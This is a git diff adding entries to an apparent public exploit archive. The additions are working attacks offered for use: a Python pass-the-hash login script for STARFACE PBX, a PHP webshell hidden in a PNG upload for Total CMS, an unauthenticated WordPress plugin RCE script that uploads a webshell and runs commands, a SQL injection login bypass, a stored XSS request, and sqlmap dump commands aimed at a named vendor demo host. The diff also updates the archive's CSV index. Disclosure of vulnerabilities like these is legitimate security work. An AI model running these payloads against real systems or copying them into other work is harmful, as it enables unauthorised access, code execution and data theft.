diff --git a/exploits/jsp/webapps/51503.txt b/exploits/jsp/webapps/51503.txt
new file mode 100644
index 000000000..a1f2c5e14
--- /dev/null
+++ b/exploits/jsp/webapps/51503.txt
@@ -0,0 +1,300 @@
+Exploit Title: STARFACE 7.3.0.10 - Authentication with Password Hash Possible
+Affected Versions: 7.3.0.10 and earlier versions
+Fixed Versions: -
+Vulnerability Type: Broken Authentication
+Security Risk: low
+Vendor URL: https://www.starface.de
+Vendor Status: notified
+Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2022-004
+Advisory Status: published
+CVE: CVE-2023-33243
+CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33243
+
+
+Introduction
+============
+
+"When functionality and comfort come together, the result is a
+state-of-the-art experience that we've dubbed 'comfortphoning'. It's a
+secure, scalable digital communication solution that meets every need
+and wish. STARFACE is easy to integrate into existing IT systems and
+flexibly grows with your requirements."
+
+(from the vendor's homepage)
+
+
+More Details
+============
+
+The image of STARFACE PBX [0] in version 7.3.0.10 can be downloaded from
+the vendor's homepage [1]. The included files can be further examined by
+either extracting the contents or running the image in a virtual
+machine. The web interface of the PBX uses the JavaScript file at the
+following path to submit the login form:
+
+------------------------------------------------------------------------
+js/prettifier.js
+------------------------------------------------------------------------
+
+The following two lines of the JavaScript file "prettifier.js" add the
+two parameters "secret" and "ack" to the form before being submitted:
+
+------------------------------------------------------------------------
+$form(document.forms[0]).add('secret', createHash(defaultVals.isAd, liv, lpv, defaultVals.k + defaultVals.bk));
+$form(document.forms[0]).add('ack', defaultVals.k);
+------------------------------------------------------------------------
+
+The JavaScript object "defaultVals" is included in the web application's
+source text. While the value of "defaultVals.k" was found to be the
+static hash of the PBX version, the value of "defaultVals.bk" contains a
+nonce only valid for the currently used session. Therefore, the form
+parameter "ack" is always the same value. For the form value "secret"
+the function "createHash()" is called with different arguments. The
+value of "defaultVals.isAd" is set to "false" when login via Active
+Directory is disabled. The parameters "liv" and "lpv" contain the
+username and password entered into the form respectively.
+
+------------------------------------------------------------------------
+const createHash = function (isAD, user, pass, nonces) {
+ if (isAD) {
+ return forAD.encode(user + nonces + pass);
+ }
+ return user + ':' + forSF(user + nonces + forSF(pass));
+};
+------------------------------------------------------------------------
+
+The expression right after the second return statement is the
+implementation used when Active Directory login is disabled which is the
+default setting. The return value is composed of the username separated
+via a colon from a value built using the "forSF()" function. The
+"forSF()" function was found to calculate the SHA512 hash value. When
+considering the arguments passed to the function, the hash is calculated
+as follows:
+
+------------------------------------------------------------------------
+SHA512(username + defaultVals.k + defaultVals.bk + SHA512(password))
+------------------------------------------------------------------------
+
+As can be seen, instead of the cleartext password the SHA512 hash of the
+password is used in the calculation. In conclusion, for the form value
+"secret" the following value is transmitted:
+
+------------------------------------------------------------------------
+username + ":" + SHA512(
+ username + defaultVals.k + defaultVals.bk + SHA512(password)
+)
+------------------------------------------------------------------------
+
+If the SHA512 hash of a user's password is known, it can be directly
+used in the calculation of the "secret" during the login process.
+Knowledge of the cleartext password is not required.
+
+This finding was also verified by analysing the decompiled Java code of
+the server component. It was also found that the authentication process
+of the REST API is vulnerable in a very similar manner.
+
+
+Proof of Concept
+================
+
+The following Python script can be used to perform a login by specifying
+a target URL, a username and the associated password hash:
+
+------------------------------------------------------------------------
+#!/usr/bin/env python3
+
+import click
+import hashlib
+import re
+import requests
+import typing
+
+
+def get_values_from_session(url, session) -> typing.Tuple[str, str]:
+ k, bk = "", ""
+ response_content = session.get(f"{url}/jsp/index.jsp").text
+ k_result = re.search("\sk : '([^']+)'", response_content)
+ bk_result = re.search("\sbk : '([^']+)'", response_content)
+ if k_result != None:
+ k = k_result.group(1)
+ if bk_result != None:
+ bk = bk_result.group(1)
+ return k, bk
+
+
+def web_login(url, login, pwhash, session) -> bool:
+ version, nonce = get_values_from_session(url, session)
+ if version == "" or nonce == "":
+ print("Web Login failed: Nonce and version hash can not be retrieved.")
+ return
+ value = login + version + nonce + pwhash
+ secret = hashlib.sha512(value.encode("utf-8")).hexdigest()
+ data = {
+ "forward": "",
+ "autologin": "false",
+ "secret": f"{login}:{secret}",
+ "ack": version,
+ }
+ login_request = session.post(
+ f"{url}/login",
+ data=data,
+ allow_redirects=False,
+ headers={"Referer": f"{url}/jsp/index.jsp"},
+ )
+ response_headers = login_request.headers
+ if "Set-Cookie" in response_headers:
+ session_id = response_headers["Set-Cookie"].split("=")[1].split(";")[0]
+ print(f"Session ID: {session_id}")
+ return True
+ else:
+ print("Invalid login data")
+ return False
+
+
+def get_nonce_from_api(url, session) -> str:
+ response_content = session.get(f"{url}/rest/login").json()
+ return response_content["nonce"] if "nonce" in response_content else ""
+
+
+def rest_login(url, login, pwhash, session):
+ nonce = get_nonce_from_api(url, session)
+ if nonce == "":
+ print("REST Login failed: Nonce can not be retrieved.")
+ return
+ value = login + nonce + pwhash
+ secret = hashlib.sha512(value.encode("utf-8")).hexdigest()
+ data = {"loginType": "Internal", "nonce": nonce, "secret": f"{login}:{secret}"}
+ login_request = session.post(
+ f"{url}/rest/login",
+ json=data,
+ headers={"Content-Type": "application/json", "X-Version": "2"},
+ )
+ response_data = login_request.json()
+ token = response_data["token"] if "token" in response_data else "none"
+ print(f"REST API Token: {token}")
+
+
+@click.command()
+@click.option('--url', help='Target System URL', required=True)
+@click.option('--login', help='Login ID', required=True)
+@click.option('--pwhash', help='Password Hash', required=True)
+def login(url, login, pwhash):
+ session = requests.session()
+ stripped_url = url.rstrip("/")
+ result = web_login(stripped_url, login, pwhash, session)
+ if result:
+ rest_login(stripped_url, login, pwhash, session)
+
+
+if __name__ == "__main__":
+ login()
+------------------------------------------------------------------------
+
+For example, the SHA512 hash of the password "starface" can be
+calculated as follows:
+
+------------------------------------------------------------------------
+$ echo -n "starface" | sha512sum
+a37542915e834f6e446137d759cdcb825a054d0baab73fd8db695fc49529bc8e52eb27979dd1dcc21849567bac74180f6511121f76f4a2a1f196670b7375f8ec -
+------------------------------------------------------------------------
+
+The Python script can be run as follows to perform a login as the user
+"0001" with the aforementioned hash:
+
+------------------------------------------------------------------------
+$ python3 login.py --url 'https://www.example.com' --login 0001 --pwhash
+'a37542915e834f6e446137d759cdcb825a054d0baab73fd8db695fc49529bc8e52eb27979dd1dcc21849567bac74180f6511121f76f4a2a1f196670b7375f8ec'
+Session ID: 2CF09656E274F000FFAD023AF37629CE
+REST API Token: 51eef8f8vp3d3u81k0imjbuuu7
+------------------------------------------------------------------------
+
+When the password hash is valid for the specified user of the targeted
+instance a session ID as well as a REST API token is returned.
+Afterwards, these values can be used to interact with the web
+application and the REST API.
+
+
+Workaround
+==========
+
+None
+
+
+Fix
+===
+
+On 4 May 2023, version 8.0.0.11 was released. In this version the
+vulnerability was addressed with a temporary solution, such that the
+password hashes are encrypted before they are saved in the database.
+This approach prevents attackers from exploiting this vulnerability in
+scenarios where they have only acquired pure database access. However,
+attackers with system level access can bypass this temporary measure as
+they can extract the encryption key and decrypt the hashes in the
+database. A solution that fixes this vulnerability entirely is still in
+progress.
+
+
+Security Risk
+=============
+
+The web interface and REST API of STARFACE allow to login using the
+password hash instead of the cleartext password. This can be exploited
+by attackers who gained access to the application's database where the
+passwords are also saved as a SHA512 hash of the cleartext passwords.
+While the precondition for this attack could be the full compromise of
+the STARFACE PBX, another attack scenario could be that attackers
+acquire access to backups of the database stored on another system.
+Furthermore, the login via password hash allows attackers for permanent
+unauthorised access to the web interface even if system access was
+obtained only temporarily. Due to the prerequisites of obtaining access
+to password hashes, the vulnerability poses a low risk only.
+
+
+Timeline
+========
+
+2022-12-06 Vulnerability identified
+2022-12-13 Customer approved disclosure to vendor
+2023-01-11 Vendor notified
+2023-05-04 Vendor released new version 8.0.0.11
+2023-05-19 CVE ID requested
+2023-05-20 CVE ID assigned
+2023-06-01 Advisory released
+
+
+References
+==========
+
+[0] https://starface.com/en/products/comfortphoning/
+[1] https://knowledge.starface.de/pages/viewpage.action?pageId=46564694
+
+
+RedTeam Pentesting GmbH
+=======================
+
+RedTeam Pentesting offers individual penetration tests performed by a
+team of specialised IT-security experts. Hereby, security weaknesses in
+company networks or products are uncovered and can be fixed immediately.
+
+As there are only few experts in this field, RedTeam Pentesting wants to
+share its knowledge and enhance the public knowledge with research in
+security-related areas. The results are made available as public
+security advisories.
+
+More information about RedTeam Pentesting can be found at:
+https://www.redteam-pentesting.de/
+
+
+Working at RedTeam Pentesting
+=============================
+
+RedTeam Pentesting is looking for penetration testers to join our team
+in Aachen, Germany. If you are interested please visit:
+https://jobs.redteam-pentesting.de/
+
+--
+RedTeam Pentesting GmbH Tel.: +49 241 510081-0
+Alter Posthof 1 Fax : +49 241 510081-99
+52062 Aachen https://www.redteam-pentesting.de
+Germany Registergericht: Aachen HRB 14004
+Geschäftsführer: Patrick Hof, Jens Liebchen
\ No newline at end of file
diff --git a/exploits/php/webapps/51494.py b/exploits/php/webapps/51494.py
index 38ad856c9..2c50c13d8 100755
--- a/exploits/php/webapps/51494.py
+++ b/exploits/php/webapps/51494.py
@@ -89,6 +89,4 @@ print(Fore.RED+"----------------------------------------------------------------
if response.status_code == 200:
scripts = re.findall(r'', response.text)
print(Fore.GREEN + "> Response After Executing the Payload at adminname parameter : "+ Fore.RESET)
- print(Fore.GREEN+">"+Fore.RESET,scripts)
-exploit.py
-Displaying exploit.py.
\ No newline at end of file
+ print(Fore.GREEN+">"+Fore.RESET,scripts)
\ No newline at end of file
diff --git a/exploits/php/webapps/51500.txt b/exploits/php/webapps/51500.txt
new file mode 100644
index 000000000..8c3df4976
--- /dev/null
+++ b/exploits/php/webapps/51500.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Total CMS 1.7.4 - Remote Code Execution (RCE)
+# Date: 02/06/2023
+# Exploit Author: tmrswrr
+# Version: 1.7.4
+# Vendor home page : https://www.totalcms.co/
+
+1) Go to this page and click edit page button
+https://www.totalcms.co/demo/soccer/
+2)After go down and will you see downloads area
+3)Add in this area shell.php file
+
+
+?PNG
+...
+";system($_REQUEST['cmd']);echo "" ?>
+IEND
+
+4) After open this file and write commands
+
+https://www.totalcms.co/cms-data/depot/cmssoccerdepot/shell.php?cmd=id
+Result :
+
+?PNG ...
+
+uid=996(caddy) gid=998(caddy) groups=998(caddy),33(www-data)
+
+IEND
\ No newline at end of file
diff --git a/exploits/php/webapps/51501.txt b/exploits/php/webapps/51501.txt
new file mode 100644
index 000000000..435ea9884
--- /dev/null
+++ b/exploits/php/webapps/51501.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Enrollment System Project v1.0 - SQL Injection Authentication Bypass (SQLI)
+# Date of found: 18/05/2023
+# Exploit Author: VIVEK CHOUDHARY @sudovivek
+# Version: V1.0
+# Tested on: Windows 10
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/14444/enrollment-system-project-source-code-using-phpmysql.html
+# CVE: CVE-2023-33584
+# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33584
+
+Vulnerability Description -
+
+ Enrollment System Project V1.0, developed by Sourcecodester, has been found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability allows an attacker to manipulate the SQL queries executed by the application. The system fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code. By exploiting this vulnerability, an attacker can bypass authentication and gain unauthorized access to the system.
+
+
+Steps to Reproduce -
+
+ The following steps outline the exploitation of the SQL Injection vulnerability in Enrollment System Project V1.0:
+
+ 1. Launch the Enrollment System Project V1.0 application.
+
+ 2. Open the login page by accessing the URL: http://localhost/enrollment/login.php.
+
+ 3. In the username and password fields, insert the following SQL Injection payload shown inside brackets to bypass authentication: {' or 1=1 #}.
+
+ 4. Click the login button to execute the SQL Injection payload.
+
+
+As a result of successful exploitation, the attacker gains unauthorized access to the system and is logged in with administrative privileges.
\ No newline at end of file
diff --git a/exploits/php/webapps/51502.txt b/exploits/php/webapps/51502.txt
new file mode 100644
index 000000000..c61e5e97c
--- /dev/null
+++ b/exploits/php/webapps/51502.txt
@@ -0,0 +1,38 @@
+# Exploit Title: Barebones CMS v2.0.2 - Stored Cross-Site Scripting (XSS) (Authenticated)
+# Date: 2023-06-03
+# Exploit Author: tmrswrr
+# Vendor Homepage: https://barebonescms.com/
+# Software Link: https://github.com/cubiclesoft/barebones-cms/archive/master.zip
+# Version: v2.0.2
+# Tested : https://demo.barebonescms.com/
+
+
+--- Description ---
+
+1) Login admin panel and go to new story :
+https://demo.barebonescms.com/sessions/127.0.0.1/moors-sluses/admin/?action=addeditasset&type=story&sec_t=241bac393bb576b2538613a18de8c01184323540
+2) Click edit button and write your payload in the title field:
+Payload: ">
+3) After save change and will you see alert button
+
+
+POST /sessions/127.0.0.1/moors-sluses/admin/ HTTP/1.1
+Host: demo.barebonescms.com
+Cookie: PHPSESSID=81ecf7072ed639fa2fda1347883265a4
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 237
+Origin: https://demo.barebonescms.com
+Dnt: 1
+Referer: https://demo.barebonescms.com/sessions/78.163.184.240/moors-sluses/admin/?action=addeditasset&id=1&type=story&lang=en-us&sec_t=241bac393bb576b2538613a18de8c01184323540
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+Te: trailers
+Connection: close
+
+action=saveasset&id=1&revision=0&type=story&sec_t=a6adec1ffa60ca5adf4377df100719b952d3f596&lang=en-us&title=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&newtag=&publish_date=2023-06-03&publish_time=12%3A07+am&unpublish_date=&unpublish_time=
\ No newline at end of file
diff --git a/exploits/php/webapps/51504.txt b/exploits/php/webapps/51504.txt
new file mode 100644
index 000000000..653e4b415
--- /dev/null
+++ b/exploits/php/webapps/51504.txt
@@ -0,0 +1,29 @@
+# Title: MotoCMS Version 3.4.3 - SQL Injection
+# Author: tmrswrr
+# Date: 01/06/2023
+# Vendor: https://www.motocms.com
+# Link: https://www.motocms.com/website-templates/demo/189526.html
+# Vulnerable Version(s): MotoCMS 3.4.3
+
+
+## Description
+MotoCMS Version 3.4.3 SQL Injection via the keyword parameter.
+
+## Steps to Reproduce
+
+1) By visiting the url:
+https://template189526.motopreview.com/store/category/search/?keyword=1
+
+2) Run sqlmap -u "https://template189526.motopreview.com/store/category/search/?keyword=1" --random-agent --level 5 --risk 3 --batch and this command sqlmap -u "https://template189526.motopreview.com/store/category/search/?keyword=1*" --random-agent --level 5 --risk 3 --batch --timeout=10 --drop-set-cookie -o --dump
+
+### Parameter & Payloads ###
+
+Parameter: keyword (GET)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: keyword=1%' AND 3602=3602 AND 'ZnYV%'='ZnYV
+
+Parameter: #1* (URI)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: https://template189526.motopreview.com:443/store/category/search/?keyword=1%' AND 6651=6651 AND 'BvJE%'='BvJE
\ No newline at end of file
diff --git a/exploits/php/webapps/51505.py b/exploits/php/webapps/51505.py
new file mode 100755
index 000000000..6c0caab8d
--- /dev/null
+++ b/exploits/php/webapps/51505.py
@@ -0,0 +1,82 @@
+# Exploit Title: File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE)
+# Date: 05/31/2023
+# Exploit Author: Mateus Machado Tesser
+# Vendor Homepage: https://advancedfilemanager.com/
+# Version: File Manager Advanced Shortcode 2.3.2
+# Tested on: Wordpress 6.1 / Linux (Ubuntu) 5.15
+# CVE: CVE-2023-2068
+
+import requests
+import json
+import pprint
+import sys
+import re
+
+PROCESS = "\033[1;34;40m[*]\033[0m"
+SUCCESS = "\033[1;32;40m[+]\033[0m"
+FAIL = "\033[1;31;40m[-]\033[0m"
+
+try:
+ COMMAND = sys.argv[2]
+ IP = sys.argv[1]
+ if len(COMMAND) > 1:
+ pass
+ if IP:
+ pass
+ else:
+ print(f'Use: {sys.argv[0]} IP COMMAND')
+except:
+ pass
+
+url = 'http://'+IP+'/' # Path to File Manager Advanced Shortcode Panel
+print(f"{PROCESS} Searching fmakey")
+
+try:
+ r = requests.get(url)
+ raw_fmakey = r.text
+ fmakey = re.findall('_fmakey.*$',raw_fmakey,re.MULTILINE)[0].split("'")[1]
+ if len(fmakey) == 0:
+ print(f"{FAIL} Cannot found fmakey!")
+except:
+ print(f"{FAIL} Cannot found fmakey!")
+
+print(f'{PROCESS} Exploiting Unauthenticated Remote Code Execution via AJAX!')
+url = "http://"+IP+"/wp-admin/admin-ajax.php"
+headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryI52DGCOt37rixRS1", "Accept": "*/*"}
+data = "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"reqid\"\r\n\r\n\r\n"
+data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n"
+data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n"
+data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hashes[l1_cG5nLWNsaXBhcnQtaGFja2VyLWhhY2tlci5wbmc]\"\r\n\r\nexploit.php\r\n"
+data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nfma_load_shortcode_fma_ui\r\n"
+data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"_fmakey\"\r\n\r\n"+fmakey+"\r\n"
+data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path\"\r\n\r\n\r\n"
+data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"url\"\r\n\r\n\r\n"
+data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"w\"\r\n\r\nfalse\r\n"
+data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"r\"\r\n\r\ntrue\r\n"
+data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide\"\r\n\r\nplugins\r\n"
+data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"operations\"\r\n\r\nupload,download\r\n"
+data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path_type\"\r\n\r\ninside\r\n"
+data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide_path\"\r\n\r\nno\r\n"
+data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"enable_trash\"\r\n\r\nno\r\n"
+data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_allow\"\r\n\r\ntext/x-php\r\n"
+data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_max_size\"\r\n\r\n2G\r\n"
+data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"exploit2.php\"\r\nContent-Type: text/x-php\r\n\r\n\r\n"
+data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"mtime[]\"\r\n\r\n\r\n------WebKitFormBoundaryI52DGCOt37rixRS1--\r\n"
+r = requests.post(url, headers=headers, data=data)
+print(f"{PROCESS} Sending AJAX request to: {url}")
+if 'errUploadMime' in r.text:
+ print(f'{FAIL} Exploit failed!')
+ sys.exit()
+elif r.headers['Content-Type'].startswith("text/html"):
+ print(f'{FAIL} Exploit failed! Try to change _fmakey')
+ sys.exit(0)
+else:
+ print(f'{SUCCESS} Exploit executed with success!')
+exploited = json.loads(r.text)
+url = ""
+print(f'{PROCESS} Getting URL with webshell')
+for i in exploited["added"]:
+ url = i['url']
+print(f"{PROCESS} Executing '{COMMAND}'")
+r = requests.get(url+'?cmd='+COMMAND)
+print(f'{SUCCESS} The application returned ({len(r.text)} length):\n'+r.text)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index d0b87c36c..e4b75c62e 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5875,6 +5875,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
37114,exploits/jsp/webapps/37114.txt,"Sendio ESP - Information Disclosure",2015-05-26,"Core Security",webapps,jsp,80,2015-05-26,2015-05-26,1,CVE-2014-0999;OSVDB-122477;CVE-2014-8391,,,,,http://www.coresecurity.com/advisories/sendio-esp-information-disclosure-vulnerability
30054,exploits/jsp/webapps/30054.txt,"SonicWALL Gms 7.x - Filter Bypass / Persistent",2013-12-05,Vulnerability-Lab,webapps,jsp,,2013-12-05,2013-12-05,0,CVE-2013-7025;OSVDB-100610,,,,,https://www.vulnerability-lab.com/get_content.php?id=1099
44469,exploits/jsp/webapps/44469.txt,"Sophos Cyberoam UTM CR25iNG - 10.6.3 MR-5 - Direct Object Reference",2018-04-16,Frogy,webapps,jsp,,2018-04-16,2018-04-16,0,CVE-2016-7786,,,,,
+51503,exploits/jsp/webapps/51503.txt,"STARFACE 7.3.0.10 - Authentication with Password Hash Possible",2023-06-04,"RedTeam Pentesting GmbH",webapps,jsp,,2023-06-04,2023-06-04,0,CVE-2023-33243,,,,,
18416,exploits/jsp/webapps/18416.txt,"stoneware webnetwork6 - Multiple Vulnerabilities",2012-01-24,"Jacob Holcomb",webapps,jsp,,2012-01-24,2012-01-24,1,CVE-2012-0286;OSVDB-78524;OSVDB-78523;OSVDB-78522;OSVDB-78521;CVE-2012-0285,,,,,
31005,exploits/jsp/webapps/31005.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/account/findForSelect.jsp?resultsForm' Cross-Site Scripting",2008-01-09,"Jan Fry & Adrian Pastor",webapps,jsp,,2008-01-09,2014-01-17,1,CVE-2008-0239;OSVDB-40749,,,,,https://www.securityfocus.com/bid/27214/info
31006,exploits/jsp/webapps/31006.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/help/index.jsp?helpUrl' Remote Frame Injection",2008-01-09,"Jan Fry & Adrian Pastor",webapps,jsp,,2008-01-09,2014-01-17,1,CVE-2008-0240;OSVDB-43279,,,,,https://www.securityfocus.com/bid/27214/info
@@ -14481,6 +14482,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
6575,exploits/php/webapps/6575.txt,"barcodegen 2.0.0 - 'class_dir' Remote File Inclusion",2008-09-26,"Br0k3n H34rT",webapps,php,,2008-09-25,2016-12-23,1,,,,,http://www.exploit-db.combarcodegen.1d-php5.v2.2.0.zip,
6558,exploits/php/webapps/6558.txt,"barcodegen 2.0.0 - Local File Inclusion",2008-09-24,dun,webapps,php,,2008-09-23,2016-12-23,1,OSVDB-48514;CVE-2008-5993,,,,http://www.exploit-db.combarcodegen.1d-php5.v2.2.0.zip,
49227,exploits/php/webapps/49227.txt,"Barcodes generator 1.0 - 'name' Stored Cross Site Scripting",2020-12-10,"Nikhil Kumar",webapps,php,,2020-12-10,2020-12-10,0,,,,,,
+51502,exploits/php/webapps/51502.txt,"Barebones CMS v2.0.2 - Stored Cross-Site Scripting (XSS) (Authenticated)",2023-06-04,tmrswrr,webapps,php,,2023-06-04,2023-06-04,0,,,,,,
5971,exploits/php/webapps/5971.pl,"BareNuked CMS 1.1.0 - Arbitrary Add Admin",2008-06-30,"CWH Underground",webapps,php,,2008-06-29,2016-12-14,1,OSVDB-46580;CVE-2008-3133,,,,http://www.exploit-db.combarenuked-1.1.0.zip,
2920,exploits/php/webapps/2920.txt,"Barman 0.0.1r3 - 'Interface.php' Remote File Inclusion",2006-12-11,DeltahackingTEAM,webapps,php,,2006-12-10,2016-09-16,1,OSVDB-32075;CVE-2006-6611,,,,http://www.exploit-db.comBarman-0.0.1r3.tgz,
38594,exploits/php/webapps/38594.txt,"Barnraiser Prairie - 'get_file.php' Directory Traversal",2013-06-25,prairie,webapps,php,,2013-06-25,2015-11-02,1,,,,,,https://www.securityfocus.com/bid/60782/info
@@ -14656,7 +14658,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9472,exploits/php/webapps/9472.txt,"Best Dating Script - Arbitrary File Upload",2009-08-18,jetli007,webapps,php,,2009-08-17,,1,,,,,,
51280,exploits/php/webapps/51280.txt,"Best pos Management System v1.0 - Remote Code Execution (RCE) on File Upload",2023-04-06,"Ahmed Ismail",webapps,php,,2023-04-06,2023-05-18,1,CVE-2023-0943,,,,,
51279,exploits/php/webapps/51279.txt,"Best pos Management System v1.0 - SQL Injection",2023-04-06,"Ahmed Ismail",webapps,php,,2023-04-06,2023-04-06,0,,,,,,
-51462,exploits/php/webapps/51462.py,"Best POS Management System v1.0 - Unauthenticated Remote Code Execution",2023-05-23,"Mesut Cetin",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
+51462,exploits/php/webapps/51462.py,"Best POS Management System v1.0 - Unauthenticated Remote Code Execution",2023-05-23,"Mesut Cetin",webapps,php,,2023-05-23,2023-06-04,1,,,,,,
49122,exploits/php/webapps/49122.txt,"Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated)",2020-11-27,Ex.Mi,webapps,php,,2020-11-27,2020-12-01,0,CVE-2020-24963,,,,,
10655,exploits/php/webapps/10655.txt,"Best Top List - Cross-Site Scripting",2009-12-25,indoushka,webapps,php,,2009-12-24,,1,OSVDB-61372,,,,,
10685,exploits/php/webapps/10685.txt,"Best Top List 2.11 - Arbitrary File Upload",2009-12-26,indoushka,webapps,php,,2009-12-25,,0,,,,,,
@@ -17797,6 +17799,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
3050,exploits/php/webapps/3050.txt,"Enigma 2 Coppermine Bridge - 'boarddir' Remote File Inclusion",2006-12-30,"Mehmet Ince",webapps,php,,2006-12-29,,1,OSVDB-33350;CVE-2006-6864,,,,,
38862,exploits/php/webapps/38862.txt,"Enorth Webpublisher CMS - 'thisday' SQL Injection",2013-12-06,xin.wang,webapps,php,,2013-12-06,2015-12-04,1,CVE-2013-6985;OSVDB-100672,,,,,https://www.securityfocus.com/bid/64110/info
28105,exploits/php/webapps/28105.txt,"eNpaper1 - 'Root_Header.php' Remote File Inclusion",2006-06-26,almaster,webapps,php,,2006-06-26,2013-09-05,1,,,,,,https://www.securityfocus.com/bid/18649/info
+51501,exploits/php/webapps/51501.txt,"Enrollment System Project v1.0 - SQL Injection Authentication Bypass (SQLI)",2023-06-04,"VIVEK CHOUDHARY",webapps,php,,2023-06-04,2023-06-04,0,CVE-2023-33584,,,,,
26650,exploits/php/webapps/26650.txt,"Entergal MX 2.0 - Multiple SQL Injections",2005-11-29,r0t,webapps,php,,2005-11-29,2013-07-07,1,CVE-2005-3958;OSVDB-21164,,,,,https://www.securityfocus.com/bid/15631/info
26916,exploits/php/webapps/26916.txt,"Enterprise Connector 1.0.2 - 'main.php' SQL Injection",2005-12-20,"Attila Gerendi",webapps,php,,2005-12-20,2013-07-18,1,CVE-2005-4563;OSVDB-22163,,,,,https://www.securityfocus.com/bid/15984/info
42713,exploits/php/webapps/42713.txt,"Enterprise Edition Payment Processor Script 3.7 - SQL Injection",2017-09-14,"Ihsan Sencan",webapps,php,,2017-09-14,2017-09-14,0,,,,,,
@@ -18159,7 +18162,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
45813,exploits/php/webapps/45813.txt,"Facturation System 1.0 - 'modid' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80,2018-11-12,2018-11-13,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comsimple-invoice-master.zip,
12521,exploits/php/webapps/12521.txt,"Factux - Local File Inclusion",2010-05-06,ALTBTA,webapps,php,,2010-05-05,,0,OSVDB-64382;OSVDB-64381;OSVDB-64380;OSVDB-64379;OSVDB-64378;OSVDB-64377;OSVDB-64376;OSVDB-64375,,,,,
49320,exploits/php/webapps/49320.txt,"Faculty Evaluation System 1.0 - Stored XSS",2020-12-22,"Vijay Sachdeva",webapps,php,,2020-12-22,2020-12-22,0,,,,,,
-51495,exploits/php/webapps/51495.py,"Faculty Evaluation System 1.0 - Unauthenticated File Upload",2023-05-31,URGAN,webapps,php,,2023-05-31,2023-05-31,0,CVE-2023-33440,,,,,
+51495,exploits/php/webapps/51495.py,"Faculty Evaluation System 1.0 - Unauthenticated File Upload",2023-05-31,URGAN,webapps,php,,2023-05-31,2023-06-04,1,CVE-2023-33440,,,,,
10230,exploits/php/webapps/10230.txt,"Fake Hit Generator 2.2 - Arbitrary File Upload",2009-11-25,DigitALL,webapps,php,,2009-11-24,,1,,,,,,
43072,exploits/php/webapps/43072.txt,"Fake Magazine Cover Script - SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php,,2017-10-30,2017-10-30,0,CVE-2017-15987,,,,,
